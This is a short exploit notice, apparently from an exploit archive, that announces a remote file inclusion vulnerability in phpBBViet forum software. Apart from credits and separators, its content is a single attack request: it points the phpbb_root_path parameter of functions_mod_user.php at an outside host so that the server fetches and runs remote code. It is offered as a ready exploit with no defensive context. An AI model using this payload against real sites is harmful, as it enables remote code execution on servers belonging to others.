id: 2289
date: 11/17/2007
title: phpBBViet <= 02.03.2007 (phpbb_root_path) Remote File Inclusion
author: xoron
cves: 

===============================================================
phpBBViet <= 02.03.2007 (phpbb_root_path) Remote File Inclusion
===============================================================



=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

phpBBViet 0.22 (phpbb_root_path) Remote File Include

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Found: xoron

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Exploit:

/includes/functions_mod_user.php?phpbb_root_path=http://netdevilz ?

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Thanx: ZeberuS - Madtoxic - Deep Emperor  and All Netdevilz member

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 



#  0day.today [2023-03-22]  #